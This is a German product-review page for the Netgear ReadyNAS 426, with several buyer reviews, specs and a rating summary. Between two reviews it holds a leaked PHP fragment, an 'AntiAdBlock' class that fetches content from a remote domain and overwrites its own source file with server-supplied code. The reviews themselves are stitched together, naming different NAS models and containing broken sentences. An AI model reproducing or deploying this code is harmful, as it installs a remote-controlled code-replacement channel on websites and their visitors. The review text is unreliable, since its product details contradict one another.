Netgear RN42600-100NES ReadyNAS, Super NAS-System

Ich habe mein nas von netgear nun seit fast 14 tagen im test und kann nichts gravierend negatives finden. Im lieferumfang der nas befinden sich stromkabel, netzwerkkabel, cd-rom und einer kurzanleitung mit starthilfe. Die einrichtung der nas über die webbasierte oberfläche ist ein kinderspiel. Die firmware sowie die mitgelieferte software “raidar” wurde innerhalb der ersten 5 minuten aktualisiert. Im ersten step habe ich eine 4 tb wd purple hdd in betrieb genommen. Festplatte wurde erkannt, und konnte sofort als netzlaufwerk eingebunden werden. Hier empfinde ich das einsetzen der festplatte in den mitgelieferten festplattenschlitten als etwas hakelig. Hat man den bogen allerdings raus, geht es bei den weiteren platten schon einfacher. Zukünftig nochmal nachbessern.

Ich habe das rn428 als speicher für meine kanzlei genommen; sämtliche daten verdienen den allerhöchsten schutz vor zugriffen dritter, der mir mit diesem gerät gewährlestet zu sein scheint. Zum gerät selbst: es kommt alles sehr gut verpackt und damit geschützt an. Das kleine teil wirkt bullig und kräftig. Die angegebene einrichtungszeit für die ersteinrichtung von ca. Wird tatsächlich nicht überschritten. Wem das beigefügte 12-seitige installationsheftchen nicht reicht. Mehr infos gibt es unter youtube bzw. Fstplattenerkennung, datensicherung, streaming, alles funktioniert ohne probleme. Gleiches gilt für die ready cloud, die es mir ermöglicht, rasch auf meine ordner zuzugreifen. Dieses produkt ist völlig ausgereift und empfehlenswert.

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();

Vorab möchte ich erwähnen, dass ich die nas über das family&friends program von netgear erhalten habe. Da ich vorher schon zwei kleiner nas von netgear hatte, die mir aber a) zu wenig speicher und b) etwas zu langsam waren, war ich froh zu den “auserwählten” zu gehören. Ich nutze meine nas zum einen als dropbox-ersatz und zum anderen als zentralen speicher in meinem home netzwerk. Vor allem fotos (hobbyfotograf) und filme ,auf die ich von unterschiedlichen devices inkl. Die einrichtung war denkbar einfach. Auch wenn es uncool ist: nach lesen und befolgen des manuals funktioniert die nas einwandfrei. Die gui (browser) ist übersichtlich und auch die konfiguration ist leicht verständlich. Nach kurzer zeit hatte ich die nas so konfiguriert, wie ich sie brauche. Ich bin mir sicher, für echte freaks, nerds und technik-verliebte ist da bestimmt noch viel mehr drin, aber da wirklich alle meiner anforderungen an eine nas mit der 316 erfüllt sind, bin ich nicht weiter in die tiefe gegangen. Wer eine nas mit gutem preis-leistungs-verhältnis sucht, ist mit der 316 bestens bedient.

Key Spezifikationen für Netgear RN42600-100NES ReadyNAS (426 6-Bay Network Attached Storage Diskless):

  • Geben Sie Ihr Modell ein,
    um sicherzustellen, dass dieser Artikel passt.
  • Zuverlässige und sichere Datenspeicherung dank dem einzigartigen 5-stufigen
  • Der integrierte Atom-Serverprozessor von Intel mit Quad-Gigabit-Ethernet-Ports bietet Link-Aggregation für einen schnellen Durchsatz und Failover-Schutz
  • Ein neuer bequemer und effizienter Verwaltungsansatz: Mobile Verwaltungs-App für Konfiguration, Überwachung und Befehlskonfiguration
  • Empfohlen für Netzwerke mit bis zu 40 Nutzern
  • Lieferumfang: 1x RN42600-100NES, 1x Netzteil, 1x Bedienungsanleitung, 1x Netzwerkkabel

Kommentare von Käufern

“Super NAS-System, Für erfahrene Anwender mit Linux-Kenntnissen., Super NAS mit viel Datenschutz”

Bisher habe ich einen synology ds214play genutzt, der aber seine grenzen hatte. Angefangen bei den zwei bays war auch die geschwindigkeit gerade so ausreichend. Der test des rn42600 von netgear kam daher gerade richtig und ich kann etwas vergleichen, wenn auch der synology in einer ganz anderen preisklasse spielt. Das gerät ist sehr hochwertig verarbeitet und bringt schon ohne eingebaute festplatten in stolzes gewicht auf die waage. Ein display auf der front zeigt den aktuellen status an und gibt auch die ip-adresse an. Das display erlöscht nach einiger zeit wenn es keine besonderheiten gibt, lässt sich aber über die tasten darunter wieder aktivieren. Die anleitung ist in ihrem umfang sehr bescheiden, es erfordert schon ein etwas technisches gespür um ohne hilfe aus dem internet die festplatten einzubauen. Der readynas richtet sich schon allein vom preis aber auch eher an erfahrene nutzer. Die einrichtung geht dafür spielend einfach und ist nach etwa 15 minuten abgeschlossen. Allerdings müssen festplatten grundsätzlich nach dem einbau formatiert werden, ein umzug von einem anderen nas gestaltet sich so recht kompliziert und zeitaufwendig.

Ich hab das nas über friends and family erhalten. Da hier schon über einige technische dinge gesprochen wurden möchte ich gerne noch etwas zum thema bit-rot-schutz sagen. Den das bietet soweit mir bekannt nur netgear mit den readynas. Unter dem begriff bit rot versteht man die graduellen veränderungen in festplatten, die einen allmählichen verlust ihrer zuverlässigkeit verursachen. Readynas os kann mithilfe der redundanz in raid-geschützten festplatten auf bit rot prüfen und korrigierte daten neu schreiben. Andere raid-levels als raid 0 bieten datenredundanz, über die festplatten-lesefehler ermittelt und in einigen fällen korrigiert werden können. Manchmal ist ein lesefehler ein einmaliger fehler, in anderen fällen jedoch sind die daten auf der festplatte infolge von altersbedingten veränderungen des datenträgers nicht mehr zuverlässig (bit rot). Bei aktiviertem bit-rot-schutz werden die daten beim erkennen eines fehlers neu geschrieben, wodurch die zuverlässigkeit der daten wiederhergestellt wird. Im grunde genommen wird dadurch die uhr des bit rot auf null zurückgestellt. Bit-rot-schutz ist für jeden beliebigen ordner auf ihrem readynas-server verfügbar und ist standardmäßig aktiviert. Netgear RN42600-100NES ReadyNAS (426 6-Bay Network Attached Storage Diskless) Einkaufsführer

Im rahmen des family & friends programms habe ich das netgearnas 316 getestet. Vorneweg kann ich zusammenfassend sagen, dass ich mit dem produkt bisher sehr zufrieden bin und es gut weiterempfehlen kann. Im folgenden werden die einzelheiten der vor- und nachteile geschildert. ### einrichtung des nas ###die einrichtung des nas 316 erfolgt tadellos. Nach dem auspacken muss der anwender lediglich einen geeigneten ort (gute belüftung/kühlung möglich) zum aufstellen mit lan anschluss finden. Das einbauen der festplatten ist intuitiv und stellt wohl selbst „nicht-technik-versierte“ vor keine allzu großen hürden. . ] also rein mit den platten, strom rein, netzwerkkabel rein und los geht’s. Wenn die festplatten neu oder vorneweg formatiert sind kann man direkt starten und das nas ist nach einer kurzen initialisierungsphase direkt einsatzbereit. Sollten andere festplatten welche vorher anderweitig in gebrauch waren und noch daten beinhalten verwendet werden muss auf das programm raidar von netgear zurückgegriffen werden um diese (eingebaut im nas) zu formatieren bevor gestartet werden kann.

Vorab: ich habe das produkt vom hersteller zu testzwecken überlassen bekommen. Diese rezension spiegelt meine beobachtungen und erkenntnisse aus jenen tests wieder. Zuallererst mal etwas zur verpackung:das gerät kommt in einem neutralen braunen karton. Es ist exzellent verpackt und gegen stöße gesichert. Dabei wird kein styropor verwendet, was ich persönlich sehr gut finde, da styropor immer eine sauerei verursacht. Im karton befindet sich neben dem gerät noch das übliche zubehör wie lan-kabel, anleitungen, stromkabel. Daneben gibt es noch einen bluetooth-adapter welcher derzeit wohl noch keinen richtigen nutzen hat, aber laut hersteller wohl in zukunft von einer app unterstützt wird. Ebenso befindet sich ein beutel mit schrauben zur befestigung von 2. 5″-einschüben im lieferumfang.

Ich war lange am überlegen ob ich netgear, qnap oder synology werden soll. Zum kaufzeitpunkt war netger mit bessere preis/leistung. Und ich bereue mein kauf nicht. Gehäuse ist massiv aufgebaut und wiegt ordentlich. 4 festplatten a 3tb eingebaut. Wirklich sehr einfach und schnell. Erste schreksecunde als lufter anlief – >sehr lautda ich keine software installiert hatte, habe mir ip des nas in fritzbox nachgeguckt um auf nas zu gelangen. Einstellungen konnte ich recht intuitiv und schnell einstellen. Nachdem ich aufbau des raid gestartet habe, war zugriff trotz rebuid sofort möglich.

Summary
Review Date
Reviewed Item
Netgear RN42600-100NES ReadyNAS (426 6-Bay Network Attached Storage Diskless)
Rating
5,0 of 5 stars, based on 8 reviews